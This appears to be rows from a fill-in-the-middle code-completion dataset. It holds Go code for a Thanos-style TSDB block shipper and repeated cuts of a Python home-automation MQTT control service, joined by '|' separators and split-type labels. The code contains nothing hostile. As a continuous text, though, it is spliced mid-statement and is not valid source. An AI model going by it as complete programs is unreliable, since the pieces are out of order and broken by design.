labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in the filesystem.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) Sync(ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists calls,
// which are properly handled by the system if they occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship blocks of the first compaction level as part of the normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip the overlap check if out-of-order uploads are enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads |
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on a subsequent Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// upload uploads the block to remote storage if it does not already exist there.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
}
return nil
}
// Meta defines the format of the thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents version 1 of the meta file format.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
}
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
}
| {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
} | conditional_block |
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def processline(userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected | # respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
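# Illustrative stdin lines for processline (device names, timestamps and values are
# made-up examples; quoting follows the shlex rules noted above):
#
# add guest42 "living room" sonoff on
# cmd "living room" "dimmer 126"
# timed add "living room" 1893456000 fuzzy off
# recurrent add "living room" 8 07 30 exact on
# info "living room"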
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
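# Illustrative only: if mosquitto.conf.in contained lines such as
# listener $devmqttport
# cafile ${certificate}
# then genconfig() would fill them in from configuration.json (e.g. "devmqttport":
# 8883); placeholders without a matching key are left untouched because
# safe_substitute() never raises KeyError.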
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
"""Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
# timeout is set to a value less than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
# successive exceptions, e.g. because the SQL database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect()
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
main() | # and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist | random_line_split |
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def processline(userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected
# and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist
# respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
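# Example sketch (hypothetical device names and timestamps; "dimmer 126" is the
# operation quoted in the comments above): stdin lines that processline() accepts,
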